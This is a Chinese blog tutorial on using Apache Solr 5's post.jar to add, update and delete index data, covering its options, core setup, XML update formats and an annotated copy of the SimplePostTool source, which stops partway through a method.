lxwt909

跟益达学Solr5之玩转post.jar

为了方便用户往solr中添加索引，Solr为用户提供了一个post.jar工具，用户只需要在命令行下运行post.jar并传入一些参数就可以完成索引的增删改操作，对，它仅仅是一个供用户进行Solr测试的工具而已，有关post.jar的使用说明如下：

SimplePostTool version 5.1.0
Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]

Supported System Properties and their defaults:
  -Dc=<core/collection>
  -Durl=<base Solr update URL> (overrides -Dc option if specified)
  -Ddata=files|web|args|stdin (default=files)
  -Dtype=<content-type> (default=application/xml)
  -Dhost=<host> (default: localhost)
  -Dport=<port> (default: 8983)
  -Dauto=yes|no (default=no)
  -Drecursive=yes|no|<depth> (default=0)
  -Ddelay=<seconds> (default=0 for files, 10 for web)
  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)
  -Dparams="<key>=<value>[&<key>=<value>...]" (values must be URL-encoded)
  -Dcommit=yes|no (default=yes)
  -Doptimize=yes|no (default=no)
  -Dout=yes|no (default=no)

This is a simple command line tool for POSTing raw data to a Solr port.
NOTE: Specifying the url/core/collection name is mandatory.
Data can be read from files specified as commandline args,
URLs specified as args, as raw commandline arg strings or via STDIN.
Examples:
  java -Dc=gettingstarted -jar post.jar *.xml
  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'
  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml
  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/
  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv
  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json
  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf
  java -Dauto -Dc=gettingstarted -jar post.jar *
  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder
  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder
The options controlled by System Properties include the Solr
URL to POST to, the Content-Type of the data, whether a commit
or optimize should be executed, and whether the response should
be written to STDOUT. If auto=yes the tool will try to set type
automatically from file name. When posting rich documents the
file name will be propagated as "resource.name" and also used
as "literal.id". You may override these or any other request parameter
through the -Dparams property. To do a commit only, use "-" as argument.
The web mode is a simple crawler following links within domain, default delay=10s.

重点在这里：

java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]

要看懂这个post.jar使用命令规范，你首先需要知道，被中括号包住的参数表示可选参数即这个参数可有可有，| 表示或者，SystemProperties表示系统属性，什么叫系统属性呢？即你通过System.setProperty();设置的参数，比如：

System.setProperty(key,value);

这里的key，value值都是随便定义的，没什么特别要求，这样你随后通过System.getProperty(key)通过key就能在任意时刻获取到该key对应的参数值，如果是在dos命令行下，你也可以通过java -Dkey=value这种方式指定，至此java [SystemProperties]这部分你应该理解了，至于后面的-jar是java命令的参数，即执行一个jar文件，-jar后面指定一个jar包路径，默认是相对于当前所在路径，-h即表示添加了这个即会打印命令提示信息，就好比你敲java -h是类似的，后面的file,folder,url,args分别表示你要提交的数据的几种不同表示形式，file即表示你要提交的数据是存在于文件中，而folder即表示你要提交的存在于文件夹中，url即表示你要提交的数据是存在于互联网上的一个URL地址表示的资源，它可能是一个HTML页面，可能是一个PDF文件，可能是一个图片等等，args即表示你要提交的数据直接在命令行敲出来，但arges并不是随随便便一个字符串就行的，它需要有固定的格式，solr才能解析，至于args的输入格式后面会说到。

Supported System Properties and their defaults:

这句下面列出了post.jar支持的几个自定义系统属性，下面我会对每个自定义系统属性一一做个说明：

   -Dc=<core/collection>
  -Durl=<base Solr update URL> (overrides -Dc option if specified)
  -Ddata=files|web|args|stdin (default=files)
  -Dtype=<content-type> (default=application/xml)
  -Dhost=<host> (default: localhost)
  -Dport=<port> (default: 8983)
  -Dauto=yes|no (default=no)
  -Drecursive=yes|no|<depth> (default=0)
  -Ddelay=<seconds> (default=0 for files, 10 for web)
  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)
  -Dparams="<key>=<value>[&<key>=<value>...]" (values must be URL-encoded)
  -Dcommit=yes|no (default=yes)
  -Doptimize=yes|no (default=no)
  -Dout=yes|no (default=no)

-D是命令行下指定系统属性的固定前缀，

c表示core名称，你需要对solr admin里的哪个core进行索引数据添加/修改/删除

url表示solr admin后台索引更新的请求URL，这个URL是固定的，一般格式是http://host:port/solr/${coreName}/update,这里的${coreName}和上面的c属性值保持一致

data表示你要提交数据的几种模式，files模式表示你要提交的数据在文件里

web表示你要提交的数据在互联网上的一个URL表示的资源文件里

args表示你要提交的数据你会直接在post.jar命令后面直接输入

stdin表示你要提交的数据需要在dos命令行下通过System.in输入流临时接收，跟args有点类似，

但不同的是，stdin模式下，post.jar后面不需要指定任何参数，直接回车即可，然后程序会等待用户输入，

用户输入完毕再回车，post.jar会接收到用户输入，post.jar重新被唤醒继续执行。而args是直接在post.jar后面

输入参数，没有一个中断过程，而stdin模式下如果用户一直没有输入，那post.jar就会一直阻塞在那里等待用户输入为止。

type表示你要提交数据的MIME类型，默认是application/xml即默认会当作是XML来处理

host表示你要链接的SOlr Admin部署服务器的主机名或者IP地址，默认是localhost

port表示你要链接的Solr Admin部署的Web容器监听的端口号，默认post.jar里设置为8983

port具体值取决于你实际部署环境而定

auto表示是否自动猜测文件类型

recursive表示是否递归，这里递归有两种情况，比如你data=folder即表示是否递归查找文件夹下的

所有文件，如果你data=web即表示是否递归抓取URL,设置为no即表示不递归操作，设置为一个数字，

即表示递归深度

delay：这里的时间延迟也分两种，如果你post的是file,那么每个file的post间隔为0，即不做延迟处理，

而如果你是post的是网络上的一个url资源，因为需要收到对方服务器的访问限制，所以必须要做一个抓取

频率限制即每抓一个睡眠一会儿，否则抓取太快太频率容易被对方封IP。

filetypes表示post.jar支持提交哪些文件类型，后面有列出默认支持的文件类型，如果你想覆盖默认值，那么

请指定此参数

params表示需要追加到Solr Admin的请求URL后面的请求参数如id=1&name=yida之类的

commit表示是否提交到solr admin后台进行索引写入，设置为false表示不提交至sor admin,但设置为true也不一定

就意味着就一定会把索引写入磁盘，这取决于solrconfig中directory配置的实现是什么，如果配置的是RAMDirectory，就仅仅只在内存中操作了。

optimize表示是否需要对索引进行优化操作，默认为no即表示不对索引进行优化

out即OutputStream表示输出流，这个参数作用就是，你请求Solr Admin添加索引数据，Solr Admin后台会返回数据给你，Solr Admin后台返回的数据你拿什么输出流来接收，默认是System.out即表示把后台返回的信息输出打印到控制台

理解上面的相关说明，再来看看官方提供的几个post.jar使用命令示例，是不是感觉so easy了？

Examples:
  java -Dc=gettingstarted -jar post.jar *.xml
  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'
  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml
  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/
  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv
  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json
  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf
  java -Dauto -Dc=gettingstarted -jar post.jar *
  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder
  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder

OK，post.jar知道怎么玩了，那是不是该来实践一把？要想往solr admin后台添加索引数据，你首先需要添加一个core，添加一个core你可以通过Solr Admin的web UI来创建，如图：

instanceDir就是你的core根目录，solr-hone就是你的SOLR_HOME,你可以在SOLR_HOME下创建多个core目录，dataDir表示你core的数据目录，当前core的索引数据会存放在dataDir下的data\index目录下，上述所有文件夹需要你手动创建(除了data\index这里的index目录，solr会自动创建)，如图：

solr_home目录下需要一个solr.xml，这个配置文件可以从solr的zip包里获取，如图：

如图找到solr.xml复制到你自己的solr-home根目录下，然后你的core目录下需要一个conf目录，用来存放当前core的solr配置，这些配置文件可以从solr的examples里找到，如图：

solrconfig.xml配置文件是每个core必须的一个配置文件，只对当前core有效，sechma.xml配置文件是用来定义索引的每个域的，比如域的名称啊，域的类型，域是否索引，是否存储，是否分词，是否存储项向量，使用什么分词器，指定同义词字典文件在哪儿，指定停用词字典文件在哪儿等等，这些信息都是是sechma.xml中定义的，如果你有点Lucene基础，那编写schema.xml就没什么压力了，只不过以前在Lucene中是直接使用Lucene API来定义域的这些信息的，现在改用XML形式表达同样的意思。注意里面还有个protwords.txt字典文件，这在Lucene中还没接触过。下面是一段有关protwords.txt字典文件的解释说明：

Protwords are the words which you do not want to be stemmed (In stemming
case manager/managing/managed/manageable all are indexed as ---> manag. Same
thing goes in case of searching. In case you do not want a particular word
to be stemmed at index/search time just put it in protwords.txt of SOLR.

大意就是Protwords表示那些你不想被还原的单词，比如manager/managing/managed/manageable这些单词，

在stemming模式下，他们全都被索引为manag，如果你不希望某个单词被stemming(转换成原型)，那么你就可以把他们放入protwords.txt字典文件中，这样他们就不会被还原成原型了。

prot即protected缩写，即受保护的意思，只有英文才存在单词还原的情况。

这样你的core目录结构就创建好了，如果你不按这种规范去创建目录结构，那么你在创建core的时候会报错，比如你可能会遇到这样的异常：

Core创建成功后，你会在solr admin 后台看到这样的界面：

当然你也可以直接通过在浏览器输入URL的方式来创建，

http://localhost:8080/solr/admin/cores?action=CREATE&name=core2&instanceDir=/opt/solr/core2&config=solrconfig.xml&schema=schema.xml&dataDir=data

name：就是你的core名称，

instanceDir就是你的core根目录，举个例子，linux下可能是/opt/solr/core2,windows下可能是C:/solr/core2

config,schema即core的两个重要的配置文件的名称，只要你core目录结构按规范创建好了，就会按照你指定的配置文件名称去conf目录下去找，dataDir表示你的core的数据目录，该用户主要用来存放你当前core的索引数据

core创建好了，那就可以在命令行下执行post.jar往solr admin中添加索引了，首先你需要在dos下切到post.jar所在目录，如图：

在运行post.jar命令之前，我们需要找一个测试用的xml文件，这里我以solr的examples目录下提供的xml为例，如图：

然后到Solr Admin web后台界面刷新页面，查看core-c的索引数量是否有变化，如图：

但是要注意，不是任何xml文件都可以被索引的，提交的XML内容是有固定的编写格式的，打开我们刚刚提交的xml文件，如图：

<add>表示添加索引，一对<doc></doc>表示Lucene中的一个Document,field表示域，name毫无疑问就是域名，field标签之间的值就是域值，<add>标签只有有一个，<add>标签下可以有多个<doc>标签，多个<doc>即表示批量添加多个document.

<add>标签还有2个可选属性，

overwrite: "true" | "false" ,默认为false,表示对于拥有相同uniqueKey的document是否需要覆盖，uniqueKey表示document的唯一主键，类似数据库表的主键，

commitWithin：表示document必须在指定的毫秒数内提交成功，否则就放弃提交。

你还可以为某个document设置权重，比如：

<add>
  <doc boost="2.5">
    <field name="employeeId">05991</field>
    <field name="office" boost="2.0">Bridgewater</field>
  </doc>
</add>

如何添加多值域？

<add>
  <doc>
    <field name="employeeId">05991</field>
    <field name="skills" update="set">Python</field>
    <field name="skills" update="set">Java</field>
    <field name="skills" update="set">Jython</field>
  </doc>
</add>

如何将某个域的值设为null?

<add>
  <doc>
    <field name="employeeId">05991</field>
    <field name="skills" update="set" null="true" />
  </doc>
</add>

你还可以在<add>标签下添加

<commit/>
<optimize/>

类似于你在Lucene里显式的调用writer.commit();writer.optimize();

如何根据ID删除document?（注意这里说的id指的是uniqueKey指定的域，uniqueKey是在schema.xml中定义的，不要与document的文档ID混为一谈）

<delete><id>05991</id></delete>

如何根据一个Query删除一个Document呢？

<delete><query>office:Bridgewater</query></delete>

office表示域名，bridgewater表示域值，默认创建的是TermQuery，域值可以有通配符，可以是正则表达式，可以使用QueryParser表达式表示，你懂的。

上面说的都是在命令行下操作，如果你觉得在命令行下操作有点蛋疼，那我们也可以在eclipse中操作，通过反编译post.jar我发现post.jar包里面就是一个SimplePostTool类，我花了点时间阅读了SimplePostTool类的源码并对其关键位置加了一些注释，源码如下：

package com.yida.framework.solr5.test;

import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileFilter;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.BufferOverflowException;
import java.nio.ByteBuffer;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.HashSet;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.TimeZone;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;
import java.util.zip.GZIPInputStream;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;

import javax.xml.bind.DatatypeConverter;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;

import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;
/**
 * 往Solr Admin后台提交索引数据的一个小测试工具
 * @author Lanxiaowei
 *
 */
@SuppressWarnings("unused")
public class SimplePostTool {
	/**Solr Admin后台部署服务器的主机名或IP地址,默认为localhost即本地*/
	private static final String DEFAULT_POST_HOST = "localhost";
	/**Solr Admin后台部署容器监听的端口号，默认为8983*/
	private static final String DEFAULT_POST_PORT = "8983";
	/**当前工具的版本号*/
	private static final String VERSION_OF_THIS_TOOL = "5.1.0";
	/**是否提交索引*/
	private static final String DEFAULT_COMMIT = "yes";
	/**是否需要优化索引*/
	private static final String DEFAULT_OPTIMIZE = "no";
	/**是否将输出流设置为System.out即控制台输出流*/
	private static final String DEFAULT_OUT = "no";
	/**是否自动猜测文件MIME类型，默认是按照文件后缀名进行判定*/
	private static final String DEFAULT_AUTO = "no";
	/**是否递归抓取，0表示不递归抓取，1表示递归抓取*/
	private static final String DEFAULT_RECURSIVE = "0";
	/**抓取时间间隔即每抓取一个URL后睡眠多少秒，单位：秒*/
	private static final int DEFAULT_WEB_DELAY = 10;
	/**默认索引提交时间间隔即每提交一个睡眠多少毫秒，单位：毫秒*/
	private static final int DEFAULT_POST_DELAY = 10;
	/**对于URL就是抓取深度，对于文件夹就是目录深度，当前深度为0*/
	private static final int MAX_WEB_DEPTH = 10;
	/**默认文件MIME类型*/
	private static final String DEFAULT_CONTENT_TYPE = "application/xml";
	/**默认支持提交的文件类型*/
	private static final String DEFAULT_FILE_TYPES = "xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log";
	/**文件提交模式*/
	static final String DATA_MODE_FILES = "files";
	/**URL后面挂参数形式提交*/
	static final String DATA_MODE_ARGS = "args";
	/**标准输入模式，选择了这种模式的话，程序会中断，等待用户输入作为提交数据*/
	static final String DATA_MODE_STDIN = "stdin";
	/**爬虫抓取模式提交索引即需要用户提供一个待抓的页面链接，内部去抓取页面内容然后提交*/
	static final String DATA_MODE_WEB = "web";
	/**默认提交模式为files即提交文件*/
	static final String DEFAULT_DATA_MODE = "files";
	boolean auto = false;
	int recursive = 0;
	int delay = 0;
	String fileTypes;
	URL solrUrl;
	OutputStream out = null;
	String type;
	String mode;
	boolean commit;
	boolean optimize;
	String[] args;
	private int currentDepth;
	static HashMap<String, String> mimeMap;
	GlobFileFilter globFileFilter;
	//每个深度的URL集合，这里的list索引即抓取深度
	List<LinkedHashSet<URL>> backlog = new ArrayList<LinkedHashSet<URL>>();
	//已抓取过的URL集合
	Set<URL> visited = new HashSet<URL>();

	static final Set<String> DATA_MODES = new HashSet<String>();
	static final String USAGE_STRING_SHORT = "Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]";
	static boolean mockMode = false;
	static PageFetcher pageFetcher;

	public static void main(String[] args) {
		String coreName = "core-test";
		System.setProperty("c",coreName);
		
		info("SimplePostTool version 5.1.0");
		if ((0 < args.length)
				&& (("-help".equals(args[0])) || ("--help".equals(args[0])) || ("-h"
						.equals(args[0])))) {
			//打印post.jar命令提示信息
			usage();
		} else {
			SimplePostTool t = parseArgsAndInit(args);
			t.execute();
		}
	}

	public void execute() {
		long startTime = System.currentTimeMillis();
		if (("files".equals(this.mode)) && (this.args.length > 0)) {
			doFilesMode();
		} else if (("args".equals(this.mode)) && (this.args.length > 0)) {
			doArgsMode();
		} else if (("web".equals(this.mode)) && (this.args.length > 0)) {
			doWebMode();
		} else if ("stdin".equals(this.mode)) {
			doStdinMode();
		} else {
			usageShort();
			return;
		}

		if (this.commit)
			commit();
		if (this.optimize)
			optimize();
		long endTime = System.currentTimeMillis();
		displayTiming(endTime - startTime);
	}

	private void displayTiming(long millis) {
		SimpleDateFormat df = new SimpleDateFormat("H:mm:ss.SSS",
				Locale.getDefault());
		df.setTimeZone(TimeZone.getTimeZone("UTC"));
		System.out.println(new StringBuilder().append("Time spent: ")
				.append(df.format(new Date(millis))).toString());
	}

	protected static SimplePostTool parseArgsAndInit(String[] args) {
		String urlStr = null;
		try {
			String mode = System.getProperty("data", "files");
			if (!DATA_MODES.contains(mode)) {
				fatal(new StringBuilder()
						.append("System Property 'data' is not valid for this tool: ")
						.append(mode).toString());
			}

			//需要追加到Solr请求URL后面的请求参数
			String params = System.getProperty("params", "");

			String host = System.getProperty("host", DEFAULT_POST_HOST);
			String port = System.getProperty("port", DEFAULT_POST_PORT);
			String core = System.getProperty("c");

			urlStr = System.getProperty("url");

			if ((urlStr == null) && (core == null)) {
				fatal("Specifying either url or core/collection is mandatory.\nUsage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]");
			}

			//若没有指定Solr请求URL,则生成默认的SOLR请求URL
			if (urlStr == null) {
				urlStr = String.format(Locale.ROOT,
						"http://%s:%s/solr/%s/update", new Object[] { host,
								port, core });
			}
			urlStr = appendParam(urlStr, params);
			URL url = new URL(urlStr);
			boolean auto = isOn(System.getProperty("auto", DEFAULT_AUTO));
			String type = System.getProperty("type");

			int recursive = 0;
			String r = System.getProperty("recursive", DEFAULT_RECURSIVE);
			try {
				recursive = Integer.parseInt(r);
			} catch (Exception e) {
				if (isOn(r)) {
					recursive = "web".equals(mode) ? 1 : 999;
				}
			}
			int delay = "web".equals(mode) ? DEFAULT_WEB_DELAY : 0;
			try {
				delay = Integer.parseInt(System
						.getProperty("delay", delay + ""));
			} catch (Exception e) {
			}
			OutputStream out = isOn(System.getProperty("out", DEFAULT_OUT)) ? System.out
					: null;
			String fileTypes = System.getProperty("filetypes",DEFAULT_FILE_TYPES);
			boolean commit = isOn(System.getProperty("commit", DEFAULT_COMMIT));
			boolean optimize = isOn(System.getProperty("optimize", DEFAULT_OPTIMIZE));

			return new SimplePostTool(mode, url, auto, type, recursive, delay,
					fileTypes, out, commit, optimize, args);
		} catch (MalformedURLException e) {
			fatal(new StringBuilder()
					.append("System Property 'url' is not a valid URL: ")
					.append(urlStr).toString());
		}
		return null;
	}

	public SimplePostTool(String mode, URL url, boolean auto, String type,
			int recursive, int delay, String fileTypes, OutputStream out,
			boolean commit, boolean optimize, String[] args) {
		this.mode = mode;
		this.solrUrl = url;
		this.auto = auto;
		this.type = type;
		this.recursive = recursive;
		this.delay = delay;
		this.fileTypes = fileTypes;
		this.globFileFilter = getFileFilterFromFileTypes(fileTypes);
		this.out = out;
		this.commit = commit;
		this.optimize = optimize;
		this.args = args;
		pageFetcher = new PageFetcher();
	}

	public SimplePostTool() {
	}

	/**
	 * 要提交的索引数据存在于文件中，你可以通过args指定一个文件目录或者一个文件路径或者xxxx\*.xml这种通配符形式
	 */
	private void doFilesMode() {
		this.currentDepth = 0;

		if (!this.args[0].equals("-")) {
			info(new StringBuilder()
					.append("Posting files to [base] url ")
					.append(this.solrUrl)
					.append(!this.auto ? new StringBuilder()
							.append(" using content-type ")
							.append(this.type == null ? DEFAULT_CONTENT_TYPE
									: this.type).toString() : "").append("...")
					.toString());
			if (this.auto)
				info(new StringBuilder()
						.append("Entering auto mode. File endings considered are ")
						.append(this.fileTypes).toString());
			if (this.recursive > 0)
				info(new StringBuilder()
						.append("Entering recursive mode, max depth=")
						.append(this.recursive).append(", delay=")
						.append(this.delay).append("s").toString());
			int numFilesPosted = postFiles(this.args, 0, this.out, this.type);
			info(new StringBuilder().append(numFilesPosted)
					.append(" files indexed.").toString());
		}
	}

	/**
	 * 要提交的索引数据直接通过args post方式提交到Solr Admin后台
	 */
	private void doArgsMode() {
		info(new StringBuilder().append("POSTing args to ")
				.append(this.solrUrl).append("...").toString());
		for (String a : this.args) {
			postData(stringToStream(a), null, this.out, this.type, this.solrUrl);
		}
	}

	/**
	 * 要提交的数据存在于互联网，需要即时去抓取网页内容，然后提交
	 * @return
	 */
	private int doWebMode() {
		reset();
		int numPagesPosted = 0;
		try {
			if (this.type != null) {
				fatal("Specifying content-type with \"-Ddata=web\" is not supported");
			}
			if (this.args[0].equals("-")) {
				return 0;
			}

			this.solrUrl = appendUrlPath(this.solrUrl, "/extract");

			info(new StringBuilder().append("Posting web pages to Solr url ")
					.append(this.solrUrl).toString());
			this.auto = true;
			info(new StringBuilder()
					.append("Entering auto mode. Indexing pages with content-types corresponding to file endings ")
					.append(this.fileTypes).toString());
			if (this.recursive > 0) {
				if (this.recursive > MAX_WEB_DEPTH) {
					this.recursive = MAX_WEB_DEPTH;
					warn("Too large recursion depth for web mode, limiting to 10...");
				}
				if (this.delay < DEFAULT_WEB_DELAY)
					warn("Never crawl an external web site faster than every "+DEFAULT_WEB_DELAY+" seconds, your IP will probably be blocked");
				info(new StringBuilder()
						.append("Entering recursive mode, depth=")
						.append(this.recursive).append(", delay=")
						.append(this.delay).append("s").toString());
			}
			numPagesPosted = postWebPages(this.args, 0, this.out);
			info(new StringBuilder().append(numPagesPosted)
					.append(" web pages indexed.").toString());
		} catch (MalformedURLException e) {
			fatal(new StringBuilder()
					.append("Wrong URL trying to append /extract to ")
					.append(this.solrUrl).toString());
		}
		return numPagesPosted;
	}

	private void doStdinMode() {
		info(new StringBuilder().append("POSTing stdin to ")
				.append(this.solrUrl).append("...").toString());
		postData(System.in, null, this.out, this.type, this.solrUrl);
	}

	private void reset() {
		this.fileTypes = "xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log";
		this.globFileFilter = getFileFilterFromFileTypes(this.fileTypes);
		this.backlog = new ArrayList<LinkedHashSet<URL>>();
		this.visited = new HashSet<URL>();
	}

	/**
	 * 打印post.jar命令使用示例
	 */
	private static void usageShort() {
		System.out
				.println("Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]\n       Please invoke with -h option for extended usage help.");
	}

	/**
	 * 打印post.jar命令提示信息
	 */
	private static void usage() {
		System.out
				.println("Usage: java [SystemProperties] -jar post.jar [-h|-] [<file|folder|url|arg> [<file|folder|url|arg>...]]\n\nSupported System Properties and their defaults:\n  -Dc=<core/collection>\n  -Durl=<base Solr update URL> (overrides -Dc option if specified)\n  -Ddata=files|web|args|stdin (default=files)\n  -Dtype=<content-type> (default=application/xml)\n  -Dhost=<host> (default: localhost)\n  -Dport=<port> (default: "+DEFAULT_POST_PORT+")\n  -Dauto=yes|no (default=no)\n  -Drecursive=yes|no|<depth> (default=0)\n  -Ddelay=<seconds> (default=0 for files, 10 for web)\n  -Dfiletypes=<type>[,<type>,...] (default=xml,json,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log)\n  -Dparams=\"<key>=<value>[&<key>=<value>...]\" (values must be URL-encoded)\n  -Dcommit=yes|no (default=yes)\n  -Doptimize=yes|no (default=no)\n  -Dout=yes|no (default=no)\n\nThis is a simple command line tool for POSTing raw data to a Solr port.\nNOTE: Specifying the url/core/collection name is mandatory.\nData can be read from files specified as commandline args,\nURLs specified as args, as raw commandline arg strings or via STDIN.\nExamples:\n  java -Dc=gettingstarted -jar post.jar *.xml\n  java -Ddata=args -Dc=gettingstarted -jar post.jar '<delete><id>42</id></delete>'\n  java -Ddata=stdin -Dc=gettingstarted -jar post.jar < hd.xml\n  java -Ddata=web -Dc=gettingstarted -jar post.jar http://example.com/\n  java -Dtype=text/csv -Dc=gettingstarted -jar post.jar *.csv\n  java -Dtype=application/json -Dc=gettingstarted -jar post.jar *.json\n  java -Durl=http://localhost:8983/solr/techproducts/update/extract -Dparams=literal.id=pdf1 -jar post.jar solr-word.pdf\n  java -Dauto -Dc=gettingstarted -jar post.jar *\n  java -Dauto -Dc=gettingstarted -Drecursive -jar post.jar afolder\n  java -Dauto -Dc=gettingstarted -Dfiletypes=ppt,html -jar post.jar afolder\nThe options controlled by System Properties include the Solr\nURL to POST to, the Content-Type of the data, whether a commit\nor optimize should be executed, and whether the response should\nbe written to STDOUT. If auto=yes the tool will try to set type\nautomatically from file name. When posting rich documents the\nfile name will be propagated as \"resource.name\" and also used\nas \"literal.id\". You may override these or any other request parameter\nthrough the -Dparams property. To do a commit only, use \"-\" as argument.\nThe web mode is a simple crawler following links within domain, default delay="+DEFAULT_WEB_DELAY+"s.");
	}

	/**
	 * 提交文件
	 * @param args
	 * @param startIndexInArgs
	 * @param out
	 * @param type
	 * @return
	 */
	public int postFiles(String[] args, int startIndexInArgs, OutputStream out,
			String type) {
		reset();
		int filesPosted = 0;
		for (int j = startIndexInArgs; j < args.length; j++) {
			File srcFile = new File(args[j]);
			if ((srcFile.isDirectory()) && (srcFile.canRead())) {
				filesPosted += postDirectory(srcFile, out, type);
			} else if ((srcFile.isFile()) && (srcFile.canRead())) {
				filesPosted += postFiles(new File[] { srcFile }, out, type);
			} else {
				File parent = srcFile.getParentFile();
				if (parent == null)
					parent = new File(".");
				String fileGlob = srcFile.getName();
				GlobFileFilter ff = new GlobFileFilter(fileGlob, false);
				File[] files = parent.listFiles(ff);
				if ((files == null) || (files.length == 0)) {
					warn(new StringBuilder()
							.append("No files or directories matching ")
							.append(srcFile).toString());
				} else
					filesPosted += postFiles(parent.listFiles(ff), out, type);
			}
		}
		return filesPosted;
	}

	/**
	 * 提交文件
	 * @param files
	 * @param startIndexInArgs
	 * @param out
	 * @param type
	 * @return
	 */
	public int postFiles(File[] files, int startIndexInArgs, OutputStream out,
			String type) {
		reset();
		int filesPosted = 0;
		for (File srcFile : files) {
			if ((srcFile.isDirectory()) && (srcFile.canRead())) {
				filesPosted += postDirectory(srcFile, out, type);
			} else if ((srcFile.isFile()) && (srcFile.canRead())) {
				filesPosted += postFiles(new File[] { srcFile }, out, type);
			} else {
				File parent = srcFile.getParentFile();
				if (parent == null)
					parent = new File(".");
				String fileGlob = srcFile.getName();
				GlobFileFilter ff = new GlobFileFilter(fileGlob, false);
				File[] fileList = parent.listFiles(ff);
				if ((fileList == null) || (fileList.length == 0)) {
					warn(new StringBuilder()
							.append("No files or directories matching ")
							.append(srcFile).toString());
				} else
					filesPosted += postFiles(fileList, out, type);
			}
		}
		return filesPosted;
	}

	/**
	 * 提交目录下所有文件
	 * @param dir
	 * @param out
	 * @param type
	 * @return  返回提交的文件数量
	 */
	private int postDirectory(File dir, OutputStream out, String type) {
		if ((dir.isHidden()) && (!dir.getName().equals(".")))
			return 0;
		info(new StringBuilder().append("Indexing directory ")
				.append(dir.getPath()).append(" (")
				.append(dir.listFiles(this.globFileFilter).length)
				.append(" files, depth=").append(this.currentDepth).append(")")
				.toString());
		int posted = 0;
		posted += postFiles(dir.listFiles(this.globFileFilter), out, type);
		if (this.recursive > this.currentDepth) {
			for (File d : dir.listFiles()) {
				if (d.isDirectory()) {
					this.currentDepth += 1;
					posted += postDirectory(d, out, type);
					this.currentDepth -= 1;
				}
			}
		}
		return posted;
	}

	/**
	 * 提交文件
	 * @param files
	 * @param out
	 * @param type
	 * @return
	 */
	public int postFiles(File[] files, OutputStream out, String type) {
		int filesPosted = 0;
		for (File srcFile : files) {
			try {
				if ((!srcFile.isFile()) || (!srcFile.isHidden())) {
					postFile(srcFile, out, type);
					Thread.sleep(DEFAULT_POST_DELAY);
					filesPosted++;
				}
			} catch (InterruptedException e) {
				throw new RuntimeException();
			}

		}
		return filesPosted;
	}

	/**
	 * 根据用户提供的url进行web模式提交索引数据
	 * @param args
	 * @param startIndexInArgs
	 * @param out
	 * @return
	 */
	public int postWebPages(String[] args, int startIndexInArgs,
			OutputStream out) {
		reset();
		LinkedHashSet<URL> s = new LinkedHashSet<URL>();
		for (int j = startIndexInArgs; j < args.length; j++) {
			try {
				URL u = new URL(normalizeUrlEnding(args[j]));
				s.add(u);
			} catch (MalformedURLException e) {
				warn(new StringBuilder()
						.append("Skipping malformed input URL: ")
						.append(args[j]).toString());
			}
		}
		//将URL集合存入backlog
		this.backlog.add(s);
		//这里0表示抓取深度，刚开始抓取深度为0
		return webCrawl(0, out);
	}

	/**
	 * 将不规范的URL标准化
	 * @param link
	 * @return
	 */
	protected static String normalizeUrlEnding(String link) {
		//如果URL中包含#号，则直接截图开头至#号位置出，#后面部分丢弃
		if (link.indexOf("#") > -1) {
			link = link.substring(0, link.indexOf("#"));
		}
		//如果URL以问号结尾，则删除结尾的问号
		if (link.endsWith("?")) {
			link = link.substring(0, link.length() - 1);
		}
